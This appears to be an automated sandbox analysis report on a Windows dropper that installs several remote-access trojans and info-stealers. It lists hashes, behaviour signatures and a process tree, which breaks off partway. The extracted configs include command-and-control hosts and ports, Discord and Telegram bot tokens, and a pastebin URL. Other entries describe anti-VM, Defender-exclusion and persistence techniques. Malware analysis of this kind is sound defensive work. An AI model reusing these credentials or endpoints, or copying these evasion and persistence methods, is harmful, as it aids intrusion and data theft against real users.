Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-12-2024 14:56
Static task
static1
Behavioral task
behavioral1
Sample
New Text Document mod.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
New Text Document mod.exe
Resource
win10v2004-20241007-en
General
-
Target
New Text Document mod.exe
-
Size
8KB
-
MD5
69994ff2f00eeca9335ccd502198e05b
-
SHA1
b13a15a5bea65b711b835ce8eccd2a699a99cead
-
SHA256
2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
-
SHA512
ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
-
SSDEEP
96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1
Malware Config
Extracted
warzonerat
dns.stipamana.com:5219
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
205.209.109.10:4449
205.209.109.10:7723
clgbfqzkkypxjps
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
discordrat
-
discord_token
MTMxNTExMzk1MTQwMjUyNDc5Mg.Gr0nG0.RZobhhDSOoVNDV4G6dfAh3s5Qo1p7HVqUhKZ3o
-
server_id
1313949691574226985
Extracted
xworm
-
Install_directory
%ProgramData%
-
install_file
ntoskrnl.exe
-
pastebin_url
https://pastebin.com/raw/5FinF5Mf
-
telegram
https://api.telegram.org/bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage?chat_id=5999137434
Signatures
-
Asyncrat family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x0007000000023ccd-2991.dat family_xworm behavioral2/memory/5724-3653-0x0000000000230000-0x000000000024C000-memory.dmp family_xworm -
Discord RAT
A RAT written in C# using Discord as a C2.
-
Discordrat family
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection powershell.exe -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/4112-6572-0x0000000009D70000-0x0000000009E92000-memory.dmp family_stormkitty -
Stormkitty family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 4248 created 3520 4248 cat.exe 56 PID 364 created 3520 364 dog.exe 56 PID 6024 created 6920 6024 powershell.exe 121 -
resource yara_rule behavioral2/memory/4112-45-0x0000000000800000-0x0000000000C62000-memory.dmp VenomRAT behavioral2/memory/4112-46-0x0000000000800000-0x0000000000C62000-memory.dmp VenomRAT behavioral2/memory/4112-6695-0x0000000000800000-0x0000000000C62000-memory.dmp VenomRAT -
Venomrat family
-
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Warzonerat family
-
Xworm family
-
Async RAT payload 3 IoCs
resource yara_rule behavioral2/memory/4112-45-0x0000000000800000-0x0000000000C62000-memory.dmp family_asyncrat behavioral2/memory/4112-46-0x0000000000800000-0x0000000000C62000-memory.dmp family_asyncrat behavioral2/memory/4112-6695-0x0000000000800000-0x0000000000C62000-memory.dmp family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ H3tyh96.exe -
Warzone RAT payload 6 IoCs
resource yara_rule behavioral2/memory/1124-21-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat behavioral2/memory/1124-27-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat behavioral2/memory/1604-30-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat behavioral2/memory/1124-34-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat behavioral2/memory/1124-60-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat behavioral2/memory/1604-135-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3196 powershell.exe 5288 powershell.exe 2664 powershell.exe 5952 powershell.exe 3968 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion H3tyh96.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion H3tyh96.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation KrnlSetup.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation H3tyh96.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C1J7SVw.exe -
Drops startup file 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CurrentLeaseTime.vbs dog.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs outvaunts.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CurrentLeaseTime.vbs cat.exe -
Executes dropped EXE 35 IoCs
pid Process 4040 wrofile1.exe 1124 wrofile1.exe 1604 wrofile1.exe 4112 H3tyh96.exe 4248 cat.exe 584 images.exe 3048 images.exe 1092 images.exe 1968 AutoHotkeyU64.exe 4376 Setup.exe 364 dog.exe 5724 KrnlSetup.exe 6136 Client-built.exe 6992 Z9Pp9pM.exe 6528 APQSKVTvd60SdAM.exe 6020 HKP098767890HJ.exe 1060 profile1.exe 4816 outvaunts.exe 1032 profile1.exe 5600 profile1.exe 6956 outvaunts.exe 3216 outvaunts.exe 5516 outvaunts.exe 3544 C1J7SVw.exe 536 7z.exe 1392 7z.exe 6812 7z.exe 6900 7z.exe 5712 7z.exe 2820 7z.exe 6428 7z.exe 804 7z.exe 2032 in.exe 2388 Intel_PTT_EK_Recertification.exe 3200 Intel_PTT_EK_Recertification.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine H3tyh96.exe -
Loads dropped DLL 8 IoCs
pid Process 536 7z.exe 1392 7z.exe 6812 7z.exe 6900 7z.exe 5712 7z.exe 2820 7z.exe 6428 7z.exe 804 7z.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts outvaunts.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Images = "C:\\ProgramData\\images.exe" wrofile1.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 42 ip-api.com -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/memory/6020-6577-0x0000000000650000-0x0000000000814000-memory.dmp autoit_exe behavioral2/memory/4816-6745-0x00000000007F0000-0x00000000009B4000-memory.dmp autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4112 H3tyh96.exe -
Suspicious use of SetThreadContext 14 IoCs
description pid Process procid_target PID 4040 set thread context of 1124 4040 wrofile1.exe 85 PID 4040 set thread context of 1604 4040 wrofile1.exe 86 PID 584 set thread context of 3048 584 images.exe 90 PID 584 set thread context of 1092 584 images.exe 91 PID 4248 set thread context of 2452 4248 cat.exe 95 PID 364 set thread context of 2392 364 dog.exe 104 PID 1060 set thread context of 1032 1060 profile1.exe 119 PID 1060 set thread context of 5600 1060 profile1.exe 120 PID 4816 set thread context of 6956 4816 outvaunts.exe 124 PID 4816 set thread context of 3216 4816 outvaunts.exe 125 PID 4816 set thread context of 5516 4816 outvaunts.exe 126 PID 2452 set thread context of 6276 2452 InstallUtil.exe 173 PID 2388 set thread context of 228 2388 Intel_PTT_EK_Recertification.exe 175 PID 3200 set thread context of 6040 3200 Intel_PTT_EK_Recertification.exe 180 -
resource yara_rule behavioral2/files/0x0007000000023cdc-6530.dat upx behavioral2/memory/6020-6536-0x0000000000650000-0x0000000000814000-memory.dmp upx behavioral2/memory/4816-6578-0x00000000007F0000-0x00000000009B4000-memory.dmp upx behavioral2/memory/6020-6577-0x0000000000650000-0x0000000000814000-memory.dmp upx behavioral2/memory/4816-6745-0x00000000007F0000-0x00000000009B4000-memory.dmp upx behavioral2/memory/2032-6833-0x00007FF7FE5E0000-0x00007FF7FEA70000-memory.dmp upx behavioral2/memory/2032-6830-0x00007FF7FE5E0000-0x00007FF7FEA70000-memory.dmp upx behavioral2/memory/2388-6856-0x00007FF7964B0000-0x00007FF796940000-memory.dmp upx behavioral2/memory/2388-6870-0x00007FF7964B0000-0x00007FF796940000-memory.dmp upx behavioral2/memory/3200-6895-0x00007FF7964B0000-0x00007FF796940000-memory.dmp upx -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 6436 sc.exe 6600 sc.exe 4768 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 804 6368 WerFault.exe 105 1120 4112 WerFault.exe 87 -
System Location Discovery: System Language Discovery 1 TTPs 31 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C1J7SVw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language whoami.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wrofile1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language APQSKVTvd60SdAM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language outvaunts.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language whoami.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dog.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HKP098767890HJ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language outvaunts.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wrofile1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language H3tyh96.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language outvaunts.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language profile1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language images.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language images.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Z9Pp9pM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language images.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language profile1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wrofile1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language profile1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language outvaunts.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5228 PING.EXE 1968 powershell.exe 5560 PING.EXE 5824 powershell.exe 2528 PING.EXE 920 powershell.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 3 IoCs
pid Process 2528 PING.EXE 5228 PING.EXE 5560 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6044 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4112 H3tyh96.exe 4112 H3tyh96.exe 4112 H3tyh96.exe 4112 H3tyh96.exe 4248 cat.exe 4248 cat.exe 4112 H3tyh96.exe 4112 H3tyh96.exe 364 dog.exe 364 dog.exe 5952 powershell.exe 5952 powershell.exe 5952 powershell.exe 6024 powershell.exe 6024 powershell.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 6024 powershell.exe 6956 outvaunts.exe 6956 outvaunts.exe 6956 outvaunts.exe 6956 outvaunts.exe 5516 outvaunts.exe 5516 outvaunts.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 3196 powershell.exe 3196 powershell.exe 3196 powershell.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 2452 InstallUtil.exe 5288 powershell.exe 5288 powershell.exe 6024 powershell.exe 3968 powershell.exe 3968 powershell.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 4816 outvaunts.exe 4816 outvaunts.exe 4816 outvaunts.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4416 New Text Document mod.exe Token: SeDebugPrivilege 4040 wrofile1.exe Token: SeDebugPrivilege 4112 H3tyh96.exe Token: SeDebugPrivilege 584 images.exe Token: SeDebugPrivilege 4248 cat.exe Token: SeDebugPrivilege 4248 cat.exe Token: SeDebugPrivilege 5724 KrnlSetup.exe Token: SeDebugPrivilege 364 dog.exe Token: SeDebugPrivilege 6136 Client-built.exe Token: SeDebugPrivilege 364 dog.exe Token: SeDebugPrivilege 2392 InstallUtil.exe Token: SeDebugPrivilege 5952 powershell.exe Token: SeDebugPrivilege 2452 InstallUtil.exe Token: SeDebugPrivilege 1060 profile1.exe Token: SeDebugPrivilege 6024 powershell.exe Token: SeDebugPrivilege 5516 outvaunts.exe Token: SeDebugPrivilege 3196 powershell.exe Token: SeRestorePrivilege 536 7z.exe Token: 35 536 7z.exe Token: SeSecurityPrivilege 536 7z.exe Token: SeSecurityPrivilege 536 7z.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeDebugPrivilege 5304 whoami.exe Token: SeRestorePrivilege 1392 7z.exe Token: 35 1392 7z.exe Token: SeSecurityPrivilege 1392 7z.exe Token: SeSecurityPrivilege 1392 7z.exe Token: SeRestorePrivilege 6812 7z.exe Token: 35 6812 7z.exe Token: SeSecurityPrivilege 6812 7z.exe Token: SeDebugPrivilege 5288 powershell.exe Token: SeSecurityPrivilege 6812 7z.exe Token: SeRestorePrivilege 6900 7z.exe Token: 35 6900 7z.exe Token: SeSecurityPrivilege 6900 7z.exe Token: SeDebugPrivilege 3968 powershell.exe Token: SeSecurityPrivilege 6900 7z.exe Token: SeRestorePrivilege 5712 7z.exe Token: 35 5712 7z.exe Token: SeSecurityPrivilege 5712 7z.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 6020 HKP098767890HJ.exe 6020 HKP098767890HJ.exe 4816 outvaunts.exe 4816 outvaunts.exe 6276 AddInProcess.exe -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 6020 HKP098767890HJ.exe 6020 HKP098767890HJ.exe 4816 outvaunts.exe 4816 outvaunts.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4112 H3tyh96.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4416 wrote to memory of 4040 4416 New Text Document mod.exe 84 PID 4416 wrote to memory of 4040 4416 New Text Document mod.exe 84 PID 4416 wrote to memory of 4040 4416 New Text Document mod.exe 84 PID 4040 wrote to memory of 1124 4040 wrofile1.exe 85 PID 4040 wrote to memory of 1124 4040 wrofile1.exe 85 PID 4040 wrote to memory of 1124 4040 wrofile1.exe 85 PID 4040 wrote to memory of 1124 4040 wrofile1.exe 85 PID 4040 wrote to memory of 1124 4040 wrofile1.exe 85 PID 4040 wrote to memory of 1124 4040 wrofile1.exe 85 PID 4040 wrote to memory of 1124 4040 wrofile1.exe 85 PID 4040 wrote to memory of 1124 4040 wrofile1.exe 85 PID 4040 wrote to memory of 1124 4040 wrofile1.exe 85 PID 4040 wrote to memory of 1124 4040 wrofile1.exe 85 PID 4040 wrote to memory of 1124 4040 wrofile1.exe 85 PID 4040 wrote to memory of 1604 4040 wrofile1.exe 86 PID 4040 wrote to memory of 1604 4040 wrofile1.exe 86 PID 4040 wrote to memory of 1604 4040 wrofile1.exe 86 PID 4040 wrote to memory of 1604 4040 wrofile1.exe 86 PID 4040 wrote to memory of 1604 4040 wrofile1.exe 86 PID 4040 wrote to memory of 1604 4040 wrofile1.exe 86 PID 4040 wrote to memory of 1604 4040 wrofile1.exe 86 PID 4040 wrote to memory of 1604 4040 wrofile1.exe 86 PID 4040 wrote to memory of 1604 4040 wrofile1.exe 86 PID 4040 wrote to memory of 1604 4040 wrofile1.exe 86 PID 4040 wrote to memory of 1604 4040 wrofile1.exe 86 PID 4416 wrote to memory of 4112 4416 New Text Document mod.exe 87 PID 4416 wrote to memory of 4112 4416 New Text Document mod.exe 87 PID 4416 wrote to memory of 4112 4416 New Text Document mod.exe 87 PID 4416 wrote to memory of 4248 4416 New Text Document mod.exe 88 PID 4416 wrote to memory of 4248 4416 New Text Document mod.exe 88 PID 1604 wrote to memory of 584 1604 wrofile1.exe 89 PID 1604 wrote to memory of 584 1604 wrofile1.exe 89 PID 1604 wrote to memory of 584 1604 wrofile1.exe 89 PID 584 wrote to memory of 3048 584 images.exe 90 PID 584 wrote to memory of 3048 584 images.exe 90 PID 584 wrote to memory of 3048 584 images.exe 90 PID 584 wrote to memory of 3048 584 images.exe 90 PID 584 wrote to memory of 3048 584 images.exe 90 PID 584 wrote to memory of 3048 584 images.exe 90 PID 584 wrote to memory of 3048 584 images.exe 90 PID 584 wrote to memory of 3048 584 images.exe 90 PID 584 wrote to memory of 3048 584 images.exe 90 PID 584 wrote to memory of 3048 584 images.exe 90 PID 584 wrote to memory of 3048 584 images.exe 90 PID 584 wrote to memory of 1092 584 images.exe 91 PID 584 wrote to memory of 1092 584 images.exe 91 PID 584 wrote to memory of 1092 584 images.exe 91 PID 584 wrote to memory of 1092 584 images.exe 91 PID 584 wrote to memory of 1092 584 images.exe 91 PID 584 wrote to memory of 1092 584 images.exe 91 PID 584 wrote to memory of 1092 584 images.exe 91 PID 584 wrote to memory of 1092 584 images.exe 91 PID 584 wrote to memory of 1092 584 images.exe 91 PID 584 wrote to memory of 1092 584 images.exe 91 PID 584 wrote to memory of 1092 584 images.exe 91 PID 4416 wrote to memory of 1968 4416 New Text Document mod.exe 92 PID 4416 wrote to memory of 1968 4416 New Text Document mod.exe 92 PID 4248 wrote to memory of 2452 4248 cat.exe 95 PID 4248 wrote to memory of 2452 4248 cat.exe 95 PID 4248 wrote to memory of 2452 4248 cat.exe 95 PID 4248 wrote to memory of 2452 4248 cat.exe 95 PID 4248 wrote to memory of 2452 4248 cat.exe 95 PID 4248 wrote to memory of 2452 4248 cat.exe 95 PID 4416 wrote to memory of 4376 4416 New Text Document mod.exe 98 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 3528 attrib.exe 4400 attrib.exe 5464 attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3520
-
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"2⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Users\Admin\AppData\Local\Temp\a\wrofile1.exe"C:\Users\Admin\AppData\Local\Temp\a\wrofile1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Users\Admin\AppData\Local\Temp\a\wrofile1.exeC:\Users\Admin\AppData\Local\Temp\a\wrofile1.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1124
-
-
C:\Users\Admin\AppData\Local\Temp\a\wrofile1.exeC:\Users\Admin\AppData\Local\Temp\a\wrofile1.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\ProgramData\images.exe"C:\ProgramData\images.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:584 -
